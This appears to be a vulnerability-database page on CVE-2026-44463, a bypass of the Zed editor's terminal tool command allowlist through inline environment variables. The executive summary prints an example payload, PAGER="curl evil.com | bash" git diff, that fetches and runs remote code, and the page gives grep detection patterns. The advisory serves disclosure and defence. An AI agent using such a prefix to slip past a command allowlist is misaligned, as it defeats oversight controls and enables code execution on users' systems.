CVE-2026-44463
Analyzed Analyzed - Analysis Complete
Zed Code Editor Terminal Permission Bypass via Environment Variables

Publication date: 2026-05-28

Last updated on: 2026-06-03

Assigner: GitHub, Inc.

Description
Zed is a code editor. Prior to 0.229.0, Zed's terminal tool permission system can be bypassed by prepending environment variable assignments to allowlisted commands, hijacking program behavior (e.g., PAGER) to execute arbitrary code. This vulnerability is fixed in 0.229.0.
CVSS Scores
EPSS Scores
Probability:
Percentile:
Meta Information
Published
2026-05-28
Last Modified
2026-06-03
Generated
2026-06-17
AI Q&A
2026-05-28
EPSS Evaluated
2026-06-16
NVD
CVE-2026-44463
EUVD
EUVD-2026-32939
Affected Vendors & Products
Showing 1 associated CPE
Vendor Product Version / Range
zed zed to 0.229.0 (exc)
Helpful Resources
Exploitability
CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-78 The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.
CWE-184 The product implements a protection mechanism that relies on a list of inputs (or properties of inputs) that are not allowed by policy or otherwise require other action to neutralize before additional processing takes place, but the list is incomplete.
Attack-Flow Graph
AI Quick Actions
Instant insights powered by AI
Executive Summary

CVE-2026-44463 is a vulnerability in Zed's terminal tool permission system that allows an attacker to bypass allowlist restrictions by injecting environment variables into commands.

The issue arises because Zed's regex-based allowlist does not account for environment variable prefixes (e.g., VAR=value cmd), which are supported by tools like Bash and CLI utilities such as git.

By prepending environment variables to allowlisted commands, an attacker can manipulate behavior of tools that respect user-controlled environment variables (e.g., PAGER, EDITOR, or GIT_SSH_COMMAND).

For example, a command like PAGER=curl git diff would execute curl as the pager instead of the default, potentially leading to arbitrary code execution if the attacker controls the environment variable value (e.g., PAGER="curl evil.com | bash" git diff).

This affects tools like git, less, and man, creating a broad attack surface.

Impact Analysis

This vulnerability can lead to arbitrary code execution by allowing attackers to bypass permission restrictions and hijack program behavior through environment variable manipulation.

The impacts include high confidentiality, integrity, and availability loss, meaning sensitive data could be exposed or altered, and system availability could be compromised.

Because it affects common tools like git, less, and man, the attack surface is broad, increasing the risk of exploitation.

Detection Guidance

This vulnerability can be detected by checking if environment variable assignments are being prepended to allowlisted commands in Zed's terminal tool usage. Specifically, look for commands where environment variables like PAGER, EDITOR, or GIT_SSH_COMMAND are set inline before allowlisted commands such as git, less, or man.

You can inspect running processes or command histories for suspicious patterns like:

  • grep -E '^[A-Z_]+=.+ (git|less|man)' ~/.bash_history
  • ps aux | grep -E '^[A-Z_]+=.+ (git|less|man)'
  • Check environment variables used in commands by reviewing scripts or tool invocations that might prepend environment variables to allowlisted commands.
Mitigation Strategies

The immediate step to mitigate this vulnerability is to upgrade Zed to version 0.229.0 or later, where the issue has been fixed.

Additionally, avoid allowing untrusted users or AI agents to influence environment variables that are prepended to allowlisted commands, as this can lead to arbitrary code execution.

Review and restrict the use of environment variable assignments in command invocations within your systems and scripts.

Compliance Impact

The vulnerability in Zed's terminal tool permission system allows attackers to execute arbitrary code by bypassing allowlist restrictions, leading to high impacts on confidentiality, integrity, and availability.

Such impacts can potentially affect compliance with common standards and regulations like GDPR and HIPAA, which require protection of sensitive data and system integrity.

However, the provided information does not explicitly mention or analyze the direct effects of this vulnerability on compliance with these standards.

Chat Assistant
Ask questions about this CVE
Hi! I’m here to help you understand CVE-2026-44463. Ask me anything about the vulnerability, its impact, or mitigation strategies.
0/70
EPSS Chart